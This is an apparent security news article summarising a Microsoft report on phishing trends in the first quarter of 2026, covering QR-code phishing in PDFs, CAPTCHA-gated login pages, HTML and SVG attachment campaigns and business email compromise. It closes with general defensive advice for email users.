Light bulb Limited Spots Available: Secure Your Lifetime Subscription on Gumroad!

May 01, 2026 · 8 min read

Microsoft Just Blocked 8.3 Billion Phishing Emails in 90 Days—QR Codes Hidden in PDFs Drove a 146% Surge

Microsoft's Q1 2026 threat report shows attackers retooling faster than filters can keep up. QR phishing more than doubled, HTML attachments became the preferred payload, and a single March campaign sent 1.5 million malicious messages to 179,000 organizations across 43 countries.

An open laptop on a cluttered desk showing an abstract email security dashboard, with a printed PDF folded next to it revealing a partial QR code, illustrating how attackers hide credential capture links inside attachments

The Numbers That Matter

Microsoft's quarterly threat trends report for January through March 2026 lands with a single dominant figure: 8.3 billion email based phishing threats blocked across Microsoft Defender for Office 365 telemetry. The volume started high—January alone accounted for 2.9 billion—dipped in February, and ended at 2.6 billion in March. Link based attacks made up 78% of all email threats over the quarter.

Per Microsoft's data published on SQ Magazine, the headline number is the one that's stayed roughly flat across quarters. What changed in Q1 2026 is the composition: which attack types are growing, which payload formats are winning, and which detection layers are getting actively bypassed.

QR Phishing: 7.6 Million in January, 18.7 Million in March

QR code phishing—often abbreviated quishing—was the fastest growing category Microsoft tracked. In January, the company blocked 7.6 million QR phishing attacks. By March, that number reached 18.7 million, a 146% increase in 90 days.

The mechanic is what makes it effective. A phishing email that contains a clickable URL gets scanned by every modern email security gateway. The URL is reputation checked against threat feeds, sandboxed, sometimes followed in a virtualized browser. A phishing email that contains a PDF attachment with a QR code embedded inside gets none of that. The gateway sees a PDF. The user sees a "scan to verify your account" prompt. The phone—which has fewer protections than the corporate inbox—follows the link.

Microsoft's data showed PDFs as the vehicle of choice: 70% of QR phishing in March arrived as a PDF attachment, up from 65% in January. The remainder came from other formats. QR codes embedded directly in email body HTML grew even faster—a 336% surge in March alone—but still represented only 5% of total QR volume.

CAPTCHA Gating: 11.9 Million Attacks in March

The second fastest growing technique in the report was CAPTCHA gated phishing. In March, Microsoft tracked 11.9 million CAPTCHA gated attacks—a 125% surge from earlier in the quarter, and the highest monthly volume Microsoft has seen in the past year.

CAPTCHA gating sits in front of the credential capture page. A real victim solves the CAPTCHA and reaches the fake login. An automated security crawler—the kind Microsoft, Google, and PhishTank run continuously—gets stuck at the CAPTCHA wall, can't render the page behind it, and walks away. The phishing URL stays on the open web for hours longer than it otherwise would.

The trend tracks with the rise of phishing as a service kits like Bluekit, which ship with antibot cloaking and CAPTCHA modules built in. The market share data inside Microsoft's report is telling: the dominant adversary in the middle kit Tycoon2FA fell from a 75% share of the AiTM market in late 2025 to 41% by March 2026—not because the technique stopped working, but because new kits with better cloaking entered the market and split the operator base.

Two March Campaigns Hit 232,000 Organizations

Volume aside, the report's most striking detail is the size of individual campaigns. Microsoft documented two:

  • February 23 to 25: A single SVG based phishing campaign delivered 1.2 million messages to more than 53,000 organizations across 23 countries.
  • March 17: A single HTML attachment campaign delivered 1.5 million confirmed malicious messages to 179,000 organizations across 43 countries.

Both campaigns relied on the same insight: detection engines tuned to URL reputation and macro execution have limited visibility into rendered HTML and SVG. An SVG file is technically an image. A modern phishing SVG includes scripted content that builds the credential capture form inside the file itself, bypasses the URL scanners entirely, and renders the form locally when the recipient opens the attachment in a browser preview.

HTML Attachments Are the New Macros

Across the quarter, the payload mix shifted decisively. Credential phishing climbed from 89% of payloads in January to 94% in March. Traditional malware delivery—the old pattern of attaching a Word document with a malicious macro—dropped to 5% to 6% by quarter end. Two attachment formats absorbed the difference:

  • HTML attachments: Reached 31% of payloads in March, a 175% increase over the start of the quarter.
  • PDF attachments: Reached 28% of payloads in March, the highest monthly volume in over a year.

An HTML attachment is, functionally, a phishing page that travels inside the email rather than living on a server somewhere. When the user opens it, the browser renders the credential form locally—no network request to a flagged domain, no DNS lookup against a blocked nameserver, no opportunity for Safe Browsing or SmartScreen to intervene before the form is on screen. Only when the victim submits credentials does the attachment make a single outbound POST to the exfiltration endpoint, by which point the operator has what they came for.

Business Email Compromise: 10.7 Million Attacks, Mostly Boring

Microsoft tracked 10.7 million BEC attempts across the quarter. The composition of those attempts is, in some ways, more interesting than the total. 82% to 84% of BEC content was generic outreach—"Hi, are you available? I need a quick favor"—designed to elicit a reply rather than steal anything in the first message. Only 9% to 10% contained explicit financial or document requests in the initial email. Gift card requests, the cliché of BEC reporting, fell 37% in February before rebounding 108% in March.

The pattern reflects what BEC operators have been moving toward for years: open with a soft message, get the target into a thread, then escalate. The first email's job is to get past the spam filter and earn a reply. The second or third email asks for the wire.

Why the Inbox Itself Is the New Battleground

Read together, the Q1 trends point to a single shift: attackers are systematically moving capabilities inside the email itself. QR codes that defer the click to a phone outside the corporate perimeter. SVG and HTML attachments that render the credential form locally. CAPTCHA gates that block crawlers but not victims. Every move is calibrated against the gateway's blind spots.

For security teams, the implication is uncomfortable: the gateway can no longer carry the load by itself. The kinds of detection that catch a typical 2024 phishing email—URL reputation, sandbox detonation of attached executables, macro static analysis—miss a 2026 phishing email that hides inside a PDF QR code or a single rendered HTML page. ESET's recent threat report made the same point from a different telemetry set: the gap between what gateways inspect and what attackers ship is widening.

What This Means for Gmail and Outlook Users

Microsoft's data is from Defender for Office 365, but the techniques cross over to Gmail. Google's own anti phishing telemetry shows the same QR shift. Apple Mail, Yahoo, and ProtonMail face the same attachment classes. The defensive moves below apply broadly:

  • Treat any QR code in an email as suspicious. Legitimate businesses rarely embed QR codes in email when a normal link works. If you must scan, copy the destination URL from the QR app's preview and inspect the domain before opening.
  • Don't open HTML or SVG attachments from unknown senders. If the sender is known but the attachment is unexpected, confirm out of band before opening. The act of opening renders the page.
  • Use phishing resistant authentication. Hardware security keys and platform passkeys defeat the AiTM kits behind the CAPTCHA wall. TOTP and SMS codes do not.
  • Audit OAuth grants and active sessions monthly. A captured session cookie keeps working until expired or revoked.
  • Be skeptical of unsolicited "quick favor" emails. Most BEC starts that way, and 84% of it never explicitly asks for money in the first message.

The Filter Arms Race Is Public Now

Microsoft publishing 8.3 billion as a quarterly number is not a flex. It's a tacit admission that the filter side of the arms race is at saturation. Even at that scale, attackers are pushing payloads through—routinely, at million message campaign volumes, with payload formats that bypass the dominant detection model. The numbers in the report are upper bounds on what got blocked, not what got delivered. The volume that did reach inboxes—Microsoft does not break it out—is what every user sees in their spam folder, their primary tab, and increasingly, their PDF attachment list.

The other lesson is structural. The kits responsible for these numbers—Bluekit, the Tycoon successors, the SVG generators—are commodity products. Operators rent them. Targeting lists like the 6.8 billion email dump on BreachForums are commodity inputs. The 1.5 million message campaign that hit 179,000 organizations in a single day on March 17 was within reach of any operator with a few hundred dollars and a kit subscription.

For now, the gateway is still doing most of the work. The Q1 2026 numbers say the gateway is also, increasingly, on the wrong side of the technique curve.

Stop Email Tracking in Gmail

Spy pixels track when you open emails, where you are, and what device you use. Gblock blocks them automatically.

Try Gblock Free for 30 Days

No credit card required. Works with Chrome, Edge, Brave, and Arc.